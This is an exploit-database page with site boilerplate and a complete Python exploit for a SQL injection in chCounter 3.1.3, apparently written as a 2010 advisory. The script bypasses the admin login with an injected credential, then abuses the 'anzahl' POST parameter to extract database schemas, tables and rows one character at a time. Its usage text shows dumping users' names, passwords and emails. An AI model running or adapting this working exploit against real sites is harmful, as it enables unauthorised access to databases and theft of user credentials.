0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
chCounter <= 3.1.3 SQL Injection Vulnerability
============================================== chCounter <= 3.1.3 SQL Injection Vulnerability ============================================== #!/usr/bin/python # # Exploit Title: chCounter <= 3.1.3 SQLInjection # Date: 2010/11/18 # Author: Matias Fontanini(mfontanini@cert.unlp.edu.ar). # Software Link: http://chcounter.org/chCounter3/getfile.php?id=5 # Version: 3.1.3 # Tested on: Ubuntu Server 10.04 with apache # # Requirements: # - Downloads must be enabled(this is not default). # - magic_quotes off. # - Access to administration site(can be bypassed if magic_quotes off) # # =SQLInjection= # Location: administration/index.php?cat=downloads&edit= # Affected parameters: anzahl # Method: POST # Severity: High # Description: When accessing administration/index.php?cat=downloads&edit=VALID_ID # and using a valid download id, an attacker is able to manipulate the "anzahl" # parameter to perform queries which only involve returning an integer. The query # output will be sent back to the client in the "anzahl" text input. # Exploit: An attacker could perform repeated crafted requests to retrieve any # database records for which the user has access. import sys import httplib, urllib import types lookupString='name="anzahl" value="' def generateHeaders(host, sessid): headers = {'Host':host, 'User-Agent':'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.12) Gecko/20101027 Ubuntu/10.10 (maverick) Firefox/3.6.12', 'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language':'en-us,en;q=0.5', 'Accept-Encoding':'deflate', 'Accept-Charset:':'ISO-8859-1,utf-8;q=0.7,*;q=0.7', 'Keep-Alive':'115', 'Connection':'keep-alive', 'Content-Type':'application/x-www-form-urlencoded', 'Referer':'http://' + host, 'Cookie':'PHPSESSID='+sessid} if sessid == '': del headers['Cookie'] return headers def loginRequest(connection, sessid, host, path): headers = generateHeaders(host, sessid) params = urllib.urlencode({'login_form':'1','login_name':'or \'=\'','login_pw':''}) connection.request('POST', path + 'administration/index.php', params, headers) return connection.getresponse() def generateSessId(connection, host, path): headers = generateHeaders(host, '') connection.request('GET', path + 'stats/online_users.php', '', headers) response = connection.getresponse() cookie = response.getheader('Set-Cookie') if type(cookie) is types.NoneType: print '[-] Could not get session id. Wrong path?' exit(2) return cookie[10:cookie.find(';')] def genSessid(host, path): print '[+] Trying ' + host + path con = connectToHost(host) sessid = generateSessId(con, host, path) print '[+] Acquired PHPSESSID -> ' + sessid con = connectToHost(sys.argv[1]) output = loginRequest(con, sessid, host, path).read() if output.find('login_name') != -1: print '[-] Could not bypass login' exit(7) return sessid def guessLen(sessid, host, field, path, dId, table): headers = generateHeaders(host, sessid) connection = connectToHost(host) params = urllib.urlencode({'dl_id':dId, 'name':'test','url':'http://test.com', 'wert':'test', 'timestamp_eintrag':'2010-11-17, 15:43:00', 'timestamp':'2010-11-17, 15:43:00', 'edit_download':'Save entry', 'anzahl':'(select length(val) from (select '+field+' as val from '+table+') as xYsdS)'}) connection.request('POST', path + 'administration/index.php?cat=downloads&edit='+str(dId), params, headers) response = connection.getresponse().read() if response.find('command denied') != -1: print '[-] Could not acces table. Acces denied.' exit(4) index = response.find(lookupString) return int(str(response[index+len(lookupString):response.find('"', index+len(lookupString))])) def guessField(sessid, host, path, dId, field, table): sz=guessLen(sessid, host, field, path, dId, table) headers = generateHeaders(host, sessid) i=1 while i <= sz: connection = connectToHost(host) params = urllib.urlencode({'dl_id':dId, 'name':'test','url':'http://test.com', 'wert':'test', 'timestamp_eintrag':'2010-11-17, 15:43:00', 'timestamp':'2010-11-17, 15:43:00', 'edit_download':'Save entry', 'anzahl':'(select ascii(substring(val,'+str(i)+',1)) from (select '+field+' as val from '+table+') as x)'}) connection.request('POST', path + 'administration/index.php?cat=downloads&edit='+str(dId), params, headers) response = connection.getresponse().read() index = response.find(lookupString) sys.stdout.write(chr(int(str(response[index+len(lookupString):response.find('"', index+len(lookupString))])))) sys.stdout.flush() i += 1 def getValidId(sessid, host, path): headers = generateHeaders(host, sessid) connection = connectToHost(host) connection.request('GET', path + 'administration/index.php?cat=downloads', '', headers) response = connection.getresponse().read() if response.find('ID') == -1: print '[-] Downloads seem to be deactivated' exit(6) index=response.find('index.php?cat=downloads&edit=') return int(str(response[index+len('index.php?cat=downloads&edit='):response.find('"', index+len('index.php?cat=downloads&edit='))])) def getRowCount(sessid, host, path, dId, field, table): headers = generateHeaders(host, sessid) connection = connectToHost(host) params = urllib.urlencode({'dl_id':dId, 'name':'test','url':'http://test.com', 'wert':'test', 'timestamp_eintrag':'2010-11-17, 15:43:00', 'timestamp':'2010-11-17, 15:43:00', 'edit_download':'Save entry', 'anzahl':'(select count(distinct('+field+')) from '+table+')'}) connection.request('POST', path + 'administration/index.php?cat=downloads&edit='+str(dId), params, headers) response = connection.getresponse().read() if response.find('command denied') != -1: print '[-] Could not acces table. Acces denied.' exit(4) index = response.find(lookupString) return int(str(response[index+len(lookupString):response.find('"', index+len(lookupString))])) def getSchemas(sessid, host, path, dId): rows=getRowCount(sessid, host, path, dId,'schema_name', 'information_schema.schemata') print '[+] Schema count: ' + str(rows) for i in range(0, rows): sys.stdout.write('[+] Table name: ') guessField(sessid, host, path, dId,'schema_name', 'information_schema.schemata limit 1 offset '+str(i)) print '' def getTables(sessid, host, path, dId): rows=getRowCount(sessid, host, path, dId,'table_name', 'information_schema.tables') print '[+] Table count: ' + str(rows) for i in range(0, rows): sys.stdout.write('[+] Table name: ') guessField(sessid, host, path, dId,'table_name', 'information_schema.tables limit 1 offset '+str(i)) print '' def getColumns(sessid, host, path, dId, table): rows=getRowCount(sessid, host, path, dId,'column_name', 'information_schema.columns where table_name = \'' + table + '\'') print '[+] Column count: ' + str(rows) for i in range(0, rows): sys.stdout.write('[+] Column name: ') guessField(sessid, host, path, dId,'column_name', 'information_schema.columns where table_name = \'' + table + '\' limit 1 offset '+str(i)) print '' def getItems(sessid, host, path, dId, table, columns, orderby): rows=getRowCount(sessid, host, path, dId, columns[0], table) print '[+] Item count: ' + str(rows) print '[+] Dump:' for i in range(0, rows): for col in columns: if len(orderby): sys.stdout.write(' || ') guessField(sessid, host, path, dId, col, table+' order by ' + orderby + ' limit 1 offset '+str(i)) else: sys.stdout.write(' || ') guessField(sessid, host, path, dId, col, table+' limit 1 offset '+str(i)) print ' || ' def connectToHost(host): con = httplib.HTTPConnection(sys.argv[1], 80) tries=5 recon=True while tries > 0 and recon == True: try: con.connect(); recon = False except: tries -= 1 if tries == 0: print '[-] Could not establish connection' exit(3) return con def printHelp(): print '[-] Usage ' + sys.argv[0] + ' <WEBSERVER> <PATH_TO_CHCOUNTER> <OPTION> [ARGS]' print ' OPTION can be:' print ' -t to list all tables' print ' -c <TABLE> to list all columns from table TABLE' print ' -s <TABLE> to list all columns from table TABLE' print ' -i <TABLE> <COLUMNS*> [ORDERBY] to list TABLE:COLUMN items.' print ' COLUMNS* can be a comma-separated list of columns' print '' print ' Examples:' print ' ' + sys.argv[0] + ' www.vulnerable.com /chCounter/ -t' print ' ' + sys.argv[0] + ' www.vulnerable.com /chCounter/ -s' print ' ' + sys.argv[0] + ' www.vulnerable.com /chCounter/ -c users' print ' ' + sys.argv[0] + ' www.vulnerable.com /chCounter/ -i users username,passwd,email' print ' ' + sys.argv[0] + ' www.vulnerable.com /chCounter/ -i users username user_id' print ' The last example outputs result ordered by user_id' exit(1) if len(sys.argv) < 4: printHelp() sessid = genSessid(sys.argv[1], sys.argv[2]) valId = getValidId(sessid, sys.argv[1], sys.argv[2]) if sys.argv[3] == '-t': getTables(sessid, sys.argv[1], sys.argv[2], valId) exit(0) if sys.argv[3] == '-c': if len(sys.argv) < 5: printHelp() getColumns(sessid, sys.argv[1], sys.argv[2], valId, sys.argv[4]) exit(0) if sys.argv[3] == '-i': if len(sys.argv) < 6: printHelp() orderby='' if len(sys.argv) == 7: orderby = sys.argv[6] orderby = sys.argv[6] getItems(sessid, sys.argv[1], sys.argv[2], valId, sys.argv[4], sys.argv[5].split(','), orderby) exit(0) if sys.argv[3] == '-s': if len(sys.argv) < 4: printHelp() getSchemas(sessid, sys.argv[1], sys.argv[2], valId) exit(0) # 0day.today [2024-09-28] #